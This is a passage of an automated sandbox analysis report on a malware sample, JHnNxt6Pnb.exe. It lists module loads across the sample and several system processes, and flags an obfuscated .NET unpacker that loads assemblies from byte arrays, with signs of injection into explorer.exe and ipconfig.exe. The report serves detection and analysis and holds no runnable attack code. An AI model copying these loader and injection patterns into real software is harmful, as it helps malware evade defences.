            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: JHnNxt6Pnb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: JHnNxt6Pnb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ipconfig.pdb source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: JHnNxt6Pnb.exe, 00000004.00000002.1669942696.0000000001930000.00000040.10000000.00040000.00000000.sdmp, JHnNxt6Pnb.exe, 00000004.00000002.1669646025.0000000001707000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: JHnNxt6Pnb.exe, JHnNxt6Pnb.exe, 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1671675082.000000000367D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.1669527051.00000000034C9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.cs.Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.cs.Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs.Net Code: ya3QZ7H1OG System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_04F87D99 push eax; iretd 0_2_04F87DA1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 0_2_04F8AA35 push ebx; iretd 0_2_04F8AA36
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041794F push ss; ret 4_2_0041797F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00417993 push ss; ret 4_2_0041797F
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_00416B24 push ss; retf 4_2_00416B27
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041D475 push eax; ret 4_2_0041D4C8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041D4C2 push eax; ret 4_2_0041D4C8
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041D4CB push eax; ret 4_2_0041D532
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041ED53 push dword ptr [914FBFDDh]; ret 4_2_0041ED74
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041D52C push eax; ret 4_2_0041D532
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041E77C push 2E339416h; ret 4_2_0041E842
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_0041779C push esp; retf 4_2_0041779D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E09AD push ecx; mov dword ptr [esp], ecx4_2_019E09B6
            Source: C:\Windows\explorer.exeCode function: 6_2_108869B5 push esp; retn 0000h6_2_10886AE7
            Source: C:\Windows\explorer.exeCode function: 6_2_10886B02 push esp; retn 0000h6_2_10886B03
            Source: C:\Windows\explorer.exeCode function: 6_2_10886B1E push esp; retn 0000h6_2_10886B1F
            Source: C:\Windows\explorer.exeCode function: 6_2_10A219B5 push esp; retn 0000h6_2_10A21AE7
            Source: C:\Windows\explorer.exeCode function: 6_2_10A21B02 push esp; retn 0000h6_2_10A21B03
            Source: C:\Windows\explorer.exeCode function: 6_2_10A21B1E push esp; retn 0000h6_2_10A21B1F
            Source: C:\Windows\explorer.exeCode function: 6_2_115E0B1E push esp; retn 0000h6_2_115E0B1F
            Source: C:\Windows\explorer.exeCode function: 6_2_115E0B02 push esp; retn 0000h6_2_115E0B03
            Source: C:\Windows\explorer.exeCode function: 6_2_115E09B5 push esp; retn 0000h6_2_115E0AE7
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00F6570D push ecx; ret 9_2_00F65720
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_038609AD push ecx; mov dword ptr [esp], ecx9_2_038609B6
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4D4C2 push eax; ret 9_2_00E4D4C8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4D4CB push eax; ret 9_2_00E4D532
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4D475 push eax; ret 9_2_00E4D4C8
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4D52C push eax; ret 9_2_00E4D532
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4779C push esp; retf 9_2_00E4779D
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E4E77C push 2E339416h; ret 9_2_00E4E842
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 9_2_00E47993 push ss; ret 9_2_00E4797F
            Source: JHnNxt6Pnb.exeStatic PE information: section name: .text entropy: 7.807750703003363
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, CVk4BkAqgtM4EmPgrkO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, E6Kw9PIeHreU7N1vZn.csHigh entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, M5oJ89kPLtZaqCjIm3.csHigh entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, PXLMp9OZGUdw2XHrZK.csHigh entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, cifycjzu6Uius0SMBh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, ICJHE62k18iImlcG7g.csHigh entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, iY9LscoqRNGQNby1ks.csHigh entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, YrQFSYAHoqOHrypnR1O.csHigh entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, byM0dcaLI90JrAHK1G.csHigh entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, Gt5uMimZYjGvA5DYGB.csHigh entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, Bohy8GG5IYcfb6Hpyw.csHigh entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, HK7o8Ix7Sef3O4yWON.csHigh entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, vIVW76QciyDMhnTEs5.csHigh entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, TUmxrsUiBFh387Pp3F.csHigh entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, uba7PbrorjVOM4GOH5.csHigh entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, hvp7roBlu5tt8sCfCj.csHigh entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, bLPwuclivPPYX0pkcA.csHigh entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, fbwr5b7b1tBIX1pc65.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, CF6at9d87kkyRS2U6N.csHigh entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, ggRwXVvoU8G6iTnm8Z.csHigh entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.7120000.5.raw.unpack, VB0K75NHNNnsBGRN1j.csHigh entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, CVk4BkAqgtM4EmPgrkO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, E6Kw9PIeHreU7N1vZn.csHigh entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, M5oJ89kPLtZaqCjIm3.csHigh entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, PXLMp9OZGUdw2XHrZK.csHigh entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, cifycjzu6Uius0SMBh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, ICJHE62k18iImlcG7g.csHigh entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, iY9LscoqRNGQNby1ks.csHigh entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, YrQFSYAHoqOHrypnR1O.csHigh entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, byM0dcaLI90JrAHK1G.csHigh entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, Gt5uMimZYjGvA5DYGB.csHigh entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, Bohy8GG5IYcfb6Hpyw.csHigh entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, HK7o8Ix7Sef3O4yWON.csHigh entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
